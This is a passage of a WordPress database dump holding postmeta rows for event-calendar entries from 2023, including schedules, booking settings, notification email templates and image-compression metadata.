:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190903,268958,'mec_tickets','a:0:{}'),(190904,268958,'mec_fees_global_inheritance','1'),(190905,268958,'mec_fees','a:0:{}'),(190906,268958,'mec_ticket_variations_global_inheritance','1'),(190907,268958,'mec_ticket_variations','a:0:{}'),(190908,268958,'mec_reg_fields_global_inheritance','1'),(190909,268958,'mec_reg_fields','a:0:{}'),(190910,268958,'mec_bfixed_fields','a:0:{}'),(190911,268958,'mec_op','a:0:{}'),(190912,268958,'mec_fields','a:0:{}'),(190913,268958,'mec_event_status','EventScheduled'),(190914,268958,'mec_moved_online_link',''),(190915,268958,'mec_cancelled_reason',''),(190916,268958,'mec_display_cancellation_reason_in_single_page',''),(190917,268958,'boldgrid_hide_page_title','0'),(190918,268958,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(190919,268958,'passster_activate_global_protection',NULL),(190920,268958,'passster_activate_protection',NULL),(190921,268958,'passster_protection_type','password'),(190922,268958,'boldgrid_in_page_containers','1'),(190936,268958,'_dp_original','267696'),(190924,268958,'passster_area_shortcode',''),(190925,268958,'_wp_old_date','2023-01-14'),(190926,268958,'mec_cost_auto_calculate','0'),(190927,268958,'mec_style_per_event','global'),(190928,268958,'mec_trailer_url',''),(190929,268958,'mec_trailer_title',''),(190930,268958,'mec_start_datetime','2023-10-21 08:00 AM'),(190931,268958,'mec_end_datetime','2023-10-22 06:00 PM'),(190932,268958,'mec_sequence','30'),(190933,268958,'mec_event_gallery','a:0:{}'),(190934,268958,'mec_related_events','a:0:{}'),(190935,268958,'mec_banner','a:0:{}'),(190937,268958,'_edit_lock','1697857319:2'),(190938,268958,'_edit_last','2'),(190975,268962,'mec_trailer_url',''),(190953,268962,'mec_dont_show_map','0'),(190954,268962,'mec_organizer_id','1'),(190955,268962,'mec_read_more',''),(190956,268962,'mec_more_info',''),(190957,268962,'mec_more_info_title',''),(190958,268962,'mec_more_info_target','_self'),(190959,268962,'mec_cost',''),(190960,268962,'mec_cost_auto_calculate','0'),(190961,268962,'mec_currency','a:0:{}'),(190962,268962,'mec_additional_organizer_ids','a:0:{}'),(190963,268962,'mec_additional_location_ids','a:0:{}'),(190964,268962,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-31\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-31\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190965,268962,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190966,268962,'mec_certain_weekdays','a:0:{}'),(190967,268962,'mec_allday','0'),(190968,268962,'one_occurrence','0'),(190969,268962,'mec_hide_time','0'),(190970,268962,'mec_hide_end_time','0'),(190971,268962,'mec_comment',''),(190972,268962,'mec_timezone','global'),(190973,268962,'mec_countdown_method','global'),(190974,268962,'mec_style_per_event','global'),(190951,268962,'mec_color',''),(190952,268962,'mec_location_id','1'),(190950,268962,'_edit_last','2'),(190948,268958,'_thumbnail_id','268961'),(190949,268962,'_edit_lock','1693507465:2'),(190946,268961,'_wp_attached_file','2023/08/2023-ESC-Oct-Seminar-web2.jpg'),(190947,268961,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:801;s:6:\"height\";i:445;s:4:\"file\";s:37:\"2023/08/2023-ESC-Oct-Seminar-web2.jpg\";s:8:\"filesize\";i:60726;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-350x194.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14297;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6546;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-768x427.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46615;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18854;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-500x445.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40947;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28747;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20650;}s:8:\"tileview\";a:5:{s:4:\"file\";s:37:\"2023-ESC-Oct-Seminar-web2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22425;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190976,268962,'mec_trailer_title',''),(190977,268962,'mec_public','1'),(190978,268962,'mec_start_date','2023-08-31'),(190979,268962,'mec_start_time_hour','8'),(190980,268962,'mec_start_time_minutes','0'),(190981,268962,'mec_start_time_ampm','AM'),(190982,268962,'mec_start_day_seconds','28800'),(190983,268962,'mec_start_datetime','2023-08-31 08:00 AM'),(190984,268962,'mec_end_date','2023-08-31'),(190985,268962,'mec_end_time_hour','6'),(190986,268962,'mec_end_time_minutes','0'),(190987,268962,'mec_end_time_ampm','PM'),(190988,268962,'mec_end_day_seconds','64800'),(190989,268962,'mec_end_datetime','2023-08-31 06:00 PM'),(190990,268962,'mec_repeat_status','0'),(190991,268962,'mec_repeat_type',''),(190992,268962,'mec_repeat_interval','1'),(190993,268962,'mec_repeat_end',''),(190994,268962,'mec_repeat_end_at_occurrences',''),(190995,268962,'mec_repeat_end_at_date',''),(190996,268962,'mec_advanced_days','a:0:{}'),(190997,268962,'mec_sequence','5'),(190998,268962,'mec_in_days',''),(190999,268962,'mec_not_in_days',''),(191000,268962,'mec_hourly_schedules','a:0:{}'),(191001,268962,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(191002,268962,'mec_tickets','a:0:{}'),(191003,268962,'mec_fees_global_inheritance','1'),(191004,268962,'mec_fees','a:0:{}'),(191005,268962,'mec_ticket_variations_global_inheritance','1'),(191006,268962,'mec_ticket_variations','a:0:{}'),(191007,268962,'mec_reg_fields_global_inheritance','1'),(191008,268962,'mec_reg_fields','a:0:{}'),(191009,268962,'mec_bfixed_fields','a:0:{}'),(191010,268962,'mec_op','a:0:{}'),(191011,268962,'mec_fields','a:0:{}'),(191012,268962,'mec_event_gallery','a:0:{}'),(191013,268962,'mec_related_events','a:0:{}'),(191014,268962,'mec_banner','a:0:{}'),(191015,268962,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(191016,268962,'mec_event_status','EventScheduled'),(191017,268962,'mec_moved_online_link',''),(191018,268962,'mec_cancelled_reason',''),(191019,268962,'mec_display_cancellation_reason_in_single_page',''),(191020,268962,'boldgrid_hide_page_title','0'),(191021,268962,'boldgrid_in_page_containers','1'),(191022,268962,'passster_area_shortcode',''),(191023,268961,'original-file','2023/08/2023-ESC-Oct-Seminar-web2-updraft-pre-smush-original.jpg'),(191024,268961,'smush-complete','1'),(191025,268961,'smush-info','The file was compressed from 59.30 KB to 57.34 KB, saving 3.31 percent, using WP-Optimize'),(191026,268961,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:60726;s:12:\"smushed-size\";i:58716;s:15:\"savings-percent\";d:3.310000000000000053290705182007513940334320068359375;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:60726;s:10:\"compressed\";i:58716;}s:6:\"medium\";a:2:{s:8:\"original\";i:14297;s:10:\"compressed\";i:14297;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6546;s:10:\"compressed\";i:6546;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:46615;s:10:\"compressed\";i:46263;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18854;s:10:\"compressed\";i:18809;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:40947;s:10:\"compressed\";i:40320;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:28747;s:10:\"compressed\";i:28538;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:20650;s:10:\"compressed\";i:20590;}s:8:\"tileview\";a:2:{s:8:\"original\";i:22425;s:10:\"compressed\";i:22273;}}}'),(191027,268963,'mec_color',''),(191028,268963,'mec_location_id','185'),(191029,268963,'mec_dont_show_map','0'),(191030,268963,'mec_organizer_id','1'),(191031,268963,'mec_read_more',''),(191032,268963,'mec_more_info',''),(191033,268963,'mec_more_info_title',''),(191034,268963,'mec_more_info_target','_self'),(191035,268963,'mec_cost',''),(191036,268963,'mec_cost_auto_calculate','0'),(191037,268963,'mec_currency','a:0:{}'),(191038,268963,'mec_additional_organizer_ids','a:0:{}'),(191039,268963,'mec_additional_location_ids','a:0:{}'),(191040,268963,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(191041,268963,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(191042,268963,'mec_certain_weekdays','a:0:{}'),(191043,268963,'mec_allday','0'),(191044,268963,'one_occurrence','0'),(191045,268963,'mec_hide_time','0'),(191046,268963,'mec_hide_end_time','0'),(191047,268963,'mec_comment',''),(191048,268963,'mec_timezone','global'),(191049,268963,'mec_countdown_method','global'),(191050,268963,'mec_style_per_event','global'),(191051,268963,'mec_trailer_url',''),(191052,268963,'mec_trailer_title',''),(191053,268963,'mec_public','1'),(191054,268963,'mec_start_date','2023-09-13'),(191055,268963,'mec_start_time_hour','10'),(191056,268963,'mec_start_time_minutes','30'),(191057,268963,'mec_start_time_ampm','AM'),(191058,268963,'mec_start_day_seconds','37800'),(191059,268963,'mec_start_datetime','2023-09-13 10:30 AM'),(191060,268963,'mec_end_date','2023-09-13'),(191061,268963,'mec_end_time_hour','11'),(191062,268963,'mec_end_time_minutes','30'),(191063,268963,'mec_end_time_ampm','AM'),(191064,268963,'mec_end_day_seconds','41400'),(191065,268963,'mec_end_datetime','2023-09-13 11:30 AM'),(191066,268963,'mec_repeat_status','0'),(191067,268963,'mec_repeat_type',''),(191068,268963,'mec_repeat_interval','1'),(191069,268963,'mec_repeat_end',''),(191070,268963,'mec_repeat_end_at_occurrences',''),(191071,268963,'mec_repeat_end_at_date',''),(191072,268963,'mec_advanced_days','a:0:{}'),(191073,268963,'mec_sequence','9'),(191074,268963,'mec_in_days',''),(191075,268963,'mec_not_in_days',''),(191076,268963,'mec_hourly_schedules','a:0:{}'),(191077,268963,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(191078,268963,'mec_tickets','a:0:{}'),(191079,268963,'mec_fees_global_inheritance','1'),(191080,268963,'mec_fees','a:0:{}'),(191081,268963,'mec_ticket_variations_global_inheritance','1'),(191082,268963,'mec_ticket_variations','a:0:{}'),(191083,268963,'mec_reg_fields_global_inheritance','1'),(191084,268963,'mec_reg_fields','a:0:{}'),(191085,268963,'mec_bfixed_fields','a:0:{}'),(191086,268963,'mec_op','a:0:{}'),(191087,268963,'mec_fields','a:0:{}'),(191088,268963,'mec_event_gallery','a:0:{}'),(191089,268963,'mec_related_events','a:0:{}'),(191090,268963,'mec_banner','a:0:{}'),(191091,268963,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(191092,268963,'mec_event_status','EventScheduled'),(191093,268963,'mec_moved_online_link',''),(191094,268963,'mec_cancelled_reason',''),(191095,268963,'mec_display_cancellation_reason_in_single_page',''),(191096,268963,'boldgrid_hide_page_title','0'),(191097,268963,'boldgrid_in_page_containers','1'),(191098,268963,'passster_area_shortcode',''),(191099,268963,'_dp_original','268962'),(191100,268963,'_edit_lock','1693501554:2'),(191101,268963,'_edit_last','2'),(191102,268964,'_wp_attached_file','2023/08/fall-path-1.jpg'),(191103,268964,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:801;s:6:\"height\";i:445;s:4:\"file\";s:23:\"2023/08/fall-path-1.jpg\";s:8:\"filesize\";i:171872;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"fall-path-1-350x194.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28779;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"fall-path-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10150;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"fall-path-1-768x427.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124377;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"fall-path-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37817;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:23:\"fall-path-1-500x445.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99734;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"fall-path-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62877;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"fall-path-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42613;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"fall-path-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48358;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191104,268963,'_thumbnail_id','268964'),(191105,268964,'original-file','2023/08/fall-path-1-updraft-pre-smush-original.jpg'),(191106,268964,'smush-complete','1'),(191107,268964,'smush-info','The file was compressed from 167.84 KB to 156.53 KB, saving 6.74 percent, using WP-Optimize'),(191108,268964,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:171872;s:12:\"smushed-size\";i:160283;s:15:\"savings-percent\";d:6.7400000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:171872;s:10:\"compressed\";i:160283;}s:6:\"medium\";a:2:{s:8:\"original\";i:28779;s:10:\"compressed\";i:27834;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10150;s:10:\"compressed\";i:10084;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:124377;s:10:\"compressed\";i:119993;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:37817;s:10:\"compressed\";i:36475;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:99734;s:10:\"compressed\";i:95291;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:62877;s:10:\"compressed\";i:60576;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:42613;s:10:\"compressed\";i:41051;}s:8:\"tileview\";a:2:{s:8:\"original\";i:48358;s:10:\"compressed\";i:46667;}}}'),(191109,268965,'protect_children',''),(191110,268965,'mec_color',''),(191111,268965,'mec_location_id','185'),(191112,268965,'mec_dont_show_map','0'),(191113,268965,'mec_organizer_id','1'),(191114,268965,'mec_read_more',''),(191115,268965,'mec_more_info',''),(191116,268965,'mec_more_info_title',''),(191117,268965,'mec_more_info_target','_self'),(191118,268965,'mec_cost',''),(191119,268965,'mec_currency','a:0:{}'),(191120,268965,'mec_additional_organizer_ids','a:0:{}'),(191121,268965,'mec_additional_location_ids','a:0:{}'),(191122,268965,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-01\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-01\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(191123,268965,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(191124,268965,'mec_certain_weekdays','a:0:{}'),(191125,268965,'mec_allday','0'),(191126,268965,'one_occurrence','0'),(191127,268965,'mec_hide_time','0'),(191128,268965,'mec_hide_end_time','0'),(191129,268965,'mec_comment',''),(191130,268965,'mec_timezone','global'),(191131,268965,'mec_countdown_method','global'),(191132,268965,'mec_public','1'),(191133,268965,'mec_start_date','2023-10-01'),(191134,268965,'mec_start_time_hour','10'),(191135,268965,'mec_start_time_minutes','30'),(191136,268965,'mec_start_time_ampm','AM'),(191137,268965,'mec_start_day_seconds','37800'),(191138,268965,'mec_end_date','2023-10-01'),(191139,268965,'mec_end_time_hour','11'),(191140,268965,'mec_end_time_minutes','30'),(191141,268965,'mec_end_time_ampm','AM'),(191142,268965,'mec_end_day_seconds','41400'),(191143,268965,'mec_repeat_status','1'),(191144,268965,'mec_repeat_type','advanced'),(191145,268965,'mec_repeat_interval','1'),(191146,268965,'mec_repeat_end','occurrences'),(191147,268965,'mec_repeat_end_at_occurrences','11'),(191148,268965,'mec_repeat_end_at_date',''),(191149,268965,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(191150,268965,'mec_in_days',''),(191151,268965,'mec_not_in_days',''),(191152,268965,'mec_hourly_schedules','a:0:{}'),(191153,268965,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(191154,268965,'mec_tickets','a:0:{}'),(191155,268965,'mec_fees_global_inheritance','1'),(191156,268965,'mec_fees','a:0:{}'),(191157,268965,'mec_ticket_variations_global_inheritance','1'),(191158,268965,'mec_ticket_variations','a:0:{}'),(191159,268965,'mec_reg_fields_global_inheritance','1'),(191160,268965,'mec_reg_fields','a:0:{}'),(191161,268965,'mec_bfixed_fields','a:0:{}'),(191162,268965,'mec_op','a:0:{}'),(191163,268965,'mec_fields','a:0:{}'),(191164,268965,'mec_event_status','EventScheduled'),(191165,268965,'mec_moved_online_link',''),(191166,268965,'mec_cancelled_reason',''),(191167,268965,'mec_display_cancellation_reason_in_single_page',''),(191168,268965,'boldgrid_hide_page_title','0'),(191169,268965,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 